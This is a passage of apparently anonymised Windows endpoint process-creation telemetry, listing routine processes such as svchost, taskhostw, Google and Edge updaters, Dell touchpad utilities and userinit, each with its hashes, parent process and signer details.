00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+928,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\Apoint.exe,1191312,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,e94c1b8e09bba1b5ab5f9a7b903de3d4,4a828b839efd6088a9d015cd9491061455172ac87e6c26b1a1b29aa827edac93,961ea5e1770e2dfa1f82bca6e04e6aa4f295ee02,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.803639100+00:00,4428,HidMonitorSvc.exe,HidMonitorSvc.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.217171800+00:00,2021-06-23 00:52:50.775121800+00:00,49826ec4-c784-4242-a323-ba906c4c838e,computerpii_0a470890c60768167990033d701e7bd881398861,154233,False,10.7740.19041.1052,False,11540474045136984,,11540474045171751,2021-06-10 00:46:11.803639100+00:00,4428,2021-06-10 00:46:11.803639100+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,4428,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,867216,2019-06-29 01:43:49+00:00,2019-11-05 04:39:34+00:00,2021-06-10 00:46:11.805074600+00:00,2019-11-05 04:39:34+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",HidMonitorSvc Application,8.1.3.144,HidMonitorSvc,HidMonitorSvc.exe,HidMonitorSvc Application,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver
+929,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.218610200+00:00,7780,DPM.exe,"""DPM.exe"" -LaunchAsHelper -LogFileName=DPM-Helper",PortableExecutable,2021-05-18 18:40:12+00:00,C:\Program Files\Dell\Dell Peripheral Manager\DPM.exe,15820280,9f5e0af77515966211006ba1faf992cf,71a938dcd7832b8a7b6cd67554f83a90b81bdcef98e1362af86a2344b412a642,af168dfd85d18d03083464e5d6112c00d2bacdea,97afe1b8859c5e7862a7ca6c971c74df,fa5314e93650999193c4eee122b6482f921d2d30db88f16ce39032f03b733af4,d7c795b55dbf276f91a9f28df6cc8562b467535b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-15 01:05:19.778381100+00:00,11792,DPMService.exe,"""DPMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.294906400+00:00,2021-06-23 00:52:50.775586800+00:00,91a134f4-7fa9-410f-9fee-23bf2aecbe40,computerpii_0a470890c60768167990033d701e7bd881398861,154246,False,10.7740.19041.1052,False,11540474045147970,,11540474045171752,2021-06-15 01:05:19.778381100+00:00,11792,2021-06-15 01:05:19.778381100+00:00,\Device\HarddiskVolume3\Program Files\Dell\Dell Peripheral Manager\DPMService.exe,11792,128,ActiveProcessStartkey,C:\Program Files\Dell\Dell Peripheral Manager,1688056,2021-05-18 18:32:07+00:00,2021-05-18 18:40:14+00:00,2021-06-15 01:05:12.297854100+00:00,2021-05-18 18:40:14+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Dell Inc.,Dell Peripheral Manager,1.4.0,DPMService.exe,DPMService.exe,Dell Peripheral Manager Service,Dell Inc.,Dell Peripheral Manager,1.4.0,DPM.exe,DPM.exe,Dell Peripheral Manager Application
+930,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.331230800+00:00,5172,sihost.exe,sihost.exe,PortableExecutable,2021-02-17 04:34:55.310848200+00:00,C:\Windows\System32\sihost.exe,111616,a21e7719d73d0322e2e7d61802cb8f80,8ee21a0ba8849d31c265b4090a9e2ebe8ba66f58a8f71d4e96509e8a78f7db00,5310ba14a05256e4d93e0b04338f53b4e1d680cb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.903599+00:00,2304,svchost.exe,svchost.exe -k netsvcs -p -s UserManager,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.344514100+00:00,2021-06-23 00:52:50.781095800+00:00,45e7cf9c-11d4-4785-bae9-87b40da40322,computerpii_0a470890c60768167990033d701e7bd881398861,154403,False,10.7740.19041.1052,False,11540474045136938,,11540474045171753,2021-06-10 00:46:10.903599+00:00,2304,2021-06-10 00:46:10.903599+00:00,svchost.exe,2304,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,sihost.exe,sihost.exe,Shell Infrastructure Host
+931,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.382590800+00:00,16300,igfxEM.exe,"""igfxEM.exe""",PortableExecutable,2021-02-15 00:31:08.020416200+00:00,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxEM.exe,905992,b8fd0897854f7981f167e1777cd0dc9d,0eba09e7418a9d87da1edbfb77139d45af7ab11fa12ccdedb7580748eb600e2e,4a8d6e7d0e1f66810ba25052c964ddcdfa64e6eb,589225e24c347b06d38b7199fe40835f,b174678cfe4dc2359258a031cf51d9ef0f42cf3a7bf1b578e07220a2a33d6bdb,3810335bb57b6fa42ac6a1d0a2746279aa4d9d34,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.990538100+00:00,2852,igfxCUIService.exe,igfxCUIService.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.438028100+00:00,2021-06-23 00:52:50.782242300+00:00,05ee483f-ab9f-4017-9265-d26a63e6b859,computerpii_0a470890c60768167990033d701e7bd881398861,154435,False,10.7740.19041.1052,False,11540474045136948,,11540474045171758,2021-06-10 00:46:10.990538100+00:00,2852,2021-06-10 00:46:10.990538100+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxCUIService.exe,2852,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,418568,2020-06-16 21:07:57+00:00,2020-06-30 20:26:50+00:00,2021-06-10 00:46:11.069217900+00:00,2021-02-15 00:31:08.007448500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXCUISERVICE,IGFXCUISERVICE.EXE,igfxCUIService Module,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXEM,IGFXEM.EXE,igfxEM Module
+932,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.418771900+00:00,11672,taskhostw.exe,taskhostw.exe USER,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.460234200+00:00,2021-06-23 00:52:50.782278100+00:00,4b831241-bc6e-45a9-927f-3667e969dcaf,computerpii_0a470890c60768167990033d701e7bd881398861,154436,False,10.7740.19041.1052,False,11540474045136925,,11540474045171760,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+933,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.418653300+00:00,11036,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.460482700+00:00,2021-06-23 00:52:50.782312700+00:00,117cdbec-2119-40ee-b109-db7d9c8b0b6c,computerpii_0a470890c60768167990033d701e7bd881398861,154437,False,10.7740.19041.1052,False,11540474045136925,,11540474045171759,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+934,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.426827400+00:00,5816,taskhostw.exe,taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E},PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.471534600+00:00,2021-06-23 00:52:50.782474300+00:00,356427e8-4727-40a4-842b-49fd38cf9834,computerpii_0a470890c60768167990033d701e7bd881398861,154441,False,10.7740.19041.1052,False,11540474045136925,,11540474045171761,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+935,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.427769900+00:00,11360,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /c",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.473538600+00:00,2021-06-23 00:52:50.782509700+00:00,5122cea9-ea48-4449-b8e7-35f1045b3698,computerpii_0a470890c60768167990033d701e7bd881398861,154442,False,10.7740.19041.1052,False,11540474045136925,,11540474045171762,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+936,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 00:51:19.543885200+00:00,8304,taskhostw.exe,taskhostw.exe,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.635633600+00:00,2021-06-23 00:52:50.782689300+00:00,2d7a83c9-7e9f-43f4-8c58-9b0ed8b28c02,computerpii_0a470890c60768167990033d701e7bd881398861,154447,False,10.7740.19041.1052,False,11540474045136925,,11540474045171763,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+937,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.553734600+00:00,8884,ApMsgFwd.exe,"""ApMsgFwd.exe"" -s{05FA8492-C047-4207-BE65-780D8591C113}",PortableExecutable,2019-11-05 04:39:28+00:00,C:\Windows\System32\DellTPad\ApMsgFwd.exe,78224,a0d01803ba23a100c85167aeb4d71443,119a56501865f1ad1b28d4200d8ad416263ac62f804d44382b3de1391316f11d,2a55b50b96ad8e4d6f3e591f95cfa9cd212e8c5c,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.136815600+00:00,12088,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.663018500+00:00,2021-06-23 00:52:50.782759500+00:00,6f8e2882-320f-49df-943b-c99227cf1385,computerpii_0a470890c60768167990033d701e7bd881398861,154449,False,10.7740.19041.1052,False,11540474045171751,,11540474045171764,2021-06-23 00:51:19.136815600+00:00,12088,2021-06-23 00:51:19.136815600+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,12088,18560,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-23 00:51:19.137196100+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",ApMsgFwd,"8, 1, 0, 157",ApMsgFwd,ApMsgFwd.exe,ApMsgFwd
+938,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:19.623594+00:00,10236,GoogleUpdate.exe,"""GoogleUpdate.exe"" /cr",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:51:19.418653300+00:00,11036,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.775007+00:00,2021-06-23 00:52:50.782917600+00:00,03a33952-60aa-4a40-aaed-87a7d9bd281f,computerpii_0a470890c60768167990033d701e7bd881398861,154455,False,10.7740.19041.1052,False,11540474045171759,,11540474045171765,2021-06-23 00:51:19.418653300+00:00,11036,2021-06-23 00:51:19.418653300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,11036,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-22 01:24:29.982603700+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+939,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:19.663301200+00:00,18268,userinit.exe,userinit.exe,PortableExecutable,2019-12-07 09:08:49.164262100+00:00,C:\Windows\System32\userinit.exe,34816,582a919ca5f944aa83895a5c633c122c,eda7ee39d4db8142a1e0788e205e80ae798035d60273e74981e09e98c8d0e740,6d0c6aea6bce05166761085b1d612558f81d877a,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:19.778693+00:00,2021-06-23 00:52:50.782954600+00:00,7c41f1b9-8cd1-4bd3-aebd-b801774c2926,computerpii_0a470890c60768167990033d701e7bd881398861,154456,False,10.7740.19041.1052,False,11540474045171720,,11540474045171766,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,0.0,2.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,userinit,USERINIT.EXE,Userinit Logon Application
